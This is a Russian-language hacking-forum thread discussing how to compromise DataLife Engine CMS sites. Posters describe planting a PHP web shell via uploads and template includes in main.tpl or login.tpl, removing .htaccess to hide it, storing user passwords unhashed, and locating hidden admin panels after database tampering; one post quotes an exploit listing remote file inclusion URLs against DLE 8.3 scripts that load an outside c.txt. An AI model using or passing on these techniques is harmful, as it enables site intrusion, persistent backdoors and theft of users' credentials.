HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #101  
Старый 12.01.2010, 20:07
YuxaS
Новичок
Регистрация: 31.03.2007
Сообщений: 3
С нами: 10060042

Репутация: 0
По умолчанию

Цитата:
Сообщение от Getozz  
Мой способ самый простой. заливаете шелл через новость. ищете в антивире . и в маин.тпл или другой шаб через админку прописываем. include('/uploads/files/shell.php');

а дальше заходим в шелл и быстренько удаляем файл хтасес из директории шелла(аплоадс и файлс).
дальше удаляеш инклуд из шабла. и с чистой душой радуемся
а для этого не нужно в index.php менять строчку:
echo $tpl->result['main'];
на
eval (' ?' . '>' . $tpl->result['main'] . '<' . '?php '); ??
или я что то не правильно понял ? объясните кто нибудь...

и ещё один вопрос, может кто знает, что нужно сделать, чтобы пароли при регистрации сохранялись в базу - как есть, без md5 кодирования ?
 
Ответить с цитированием

  #102  
Старый 13.01.2010, 23:30
SuNDowN
Участник форума
Регистрация: 31.03.2008
Сообщений: 160
С нами: 9533780

Репутация: 97
По умолчанию

Может кто запалит способ заливки шелла через админские права в DLE v8.2 есть же способ! Лично я ++ поставлю! =)
 
Ответить с цитированием

  #103  
Старый 14.01.2010, 03:06
In.Exploit
Banned
Регистрация: 03.12.2009
Сообщений: 173
С нами: 8652576

Репутация: 47
По умолчанию

Цитата:
Сообщение от SuNDowN  
Может кто запалит способ заливки шелла через админские права в DLE v8.2 есть же способ! Лично я ++ поставлю! =)
Есть. в login.tpl

или там где выбор шаблона для категории.

или же инклудь в маин.тпл
 
Ответить с цитированием

  #104  
Старый 15.01.2010, 13:37
SuNDowN
Участник форума
Регистрация: 31.03.2008
Сообщений: 160
С нами: 9533780

Репутация: 97
Wink

Цитата:
Сообщение от In.Exploit  
Есть. в login.tpl

или там где выбор шаблона для категории.

или же инклудь в маин.тпл
При помощи этого товарища и своих усилей нашёл способ заливки шелла через админ панель, впрочем она нечем не отличается от выше указанных просто в версиях от 8.0, а именно в 8.2 нужно в маин.тпл инклудить при помощи тега:
Код:
{include file="file.php"}
 
Ответить с цитированием

  #105  
Старый 17.01.2010, 20:58
V1sTeR
Новичок
Регистрация: 27.10.2009
Сообщений: 1
С нами: 8704804

Репутация: 0
По умолчанию

Кроме шаблона, можно еще как-нибудь залить шелл? DLE 7.5-8.3
 
Ответить с цитированием

  #106  
Старый 31.01.2010, 21:44
RedX
Познающий
Регистрация: 12.06.2008
Сообщений: 32
С нами: 9427499

Репутация: 22
По умолчанию

Цитата:
================================================== ======================================
| # Title : DataLife Engine 8.3 RFI Vulnerability
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : www.iq-ty.com/vb
| # Script Home : http://villehost.net/files/DataLife%20Engine%208.3%20Full%20English%20UTF-8%20Encoded%20-%20www.cms-pedia.com.rar (pass=www.cms-pedia.com)
| # Dork : Powered by CMS Pedia � 2009 (DataLife Engine Support � 2009. CMS Pedia)
| # Tested on : windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)
| # Bug : RFI
====================== Exploit By indoushka =================================
# Exploit :

1- RFI

http://localhost/upload/engine/inc/include/init.php?selected_language=http://localhost/c.txt?

http://localhost/upload/engine/inc/help.php?config[langs]=http://localhost/c.txt?

http://localhost/upload/engine/ajax/pm.php?config[lang_=[EV!L]

http://localhost/upload/engine/ajax/addcomments.php?_REQUEST[skin]]=http://localhost/c.txt?

http://localhost/upload/engine/ajax/addcomments.php?_REQUEST[skin]]=http://localhost/c.txt?

http://www.example.com/engine/inc/include/init.php?selected_language=http://www.example2.com
http://www.example.com/engine/inc/help.php?config[langs]=http://www.example2.com
http://www.example.com/engine/ajax/pm.php?config[lang_=http://www.example2.com
http://www.example.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://www.example2.com

Последний раз редактировалось RedX; 31.01.2010 в 21:47..
 
Ответить с цитированием

  #107  
Старый 10.02.2010, 10:43
EoGeneo
Познающий
Регистрация: 29.08.2009
Сообщений: 75
С нами: 8789993

Репутация: 5
По умолчанию

Вопрос. Такой. есть Доступ к БД. Могу сдлеать юзеру админ права. Но немогу найти админку. что посоветуете?
 
Ответить с цитированием

  #108  
Старый 10.02.2010, 12:55
flagmen
Новичок
Регистрация: 14.11.2009
Сообщений: 19
С нами: 8679046

Репутация: 0
По умолчанию

Сделай юзеру админ права и войди в аккаунт юзера, там наверняка и появится ссыль в админ панель
 
Ответить с цитированием

  #109  
Старый 10.02.2010, 13:08
EoGeneo
Познающий
Регистрация: 29.08.2009
Сообщений: 75
С нами: 8789993

Репутация: 5
Smile

Цитата:
Сообщение от flagmen  
Сделай юзеру админ права и войди в аккаунт юзера, там наверняка и появится ссыль в админ панель
Ты думаешь я не проверял ))) они заходят набирая путь до админки руками
 
Ответить с цитированием

  #110  
Старый 10.02.2010, 15:55
MagNomeTik
Познающий
Регистрация: 11.01.2007
Сообщений: 72
С нами: 10173782

Репутация: 102
По умолчанию

В последних версиях DLE в меню редактирования любой новости есть пункт "Редактировать новость (Админка)".
Выделяешь этот пункт и видишь в строке состояния примерно такую вещь http://сайт/admin.php?mod=editnews&action=editnews&id=25303
Отсюда можешь уже можешь разглядеть)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Уязвимости CMS / форумов 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.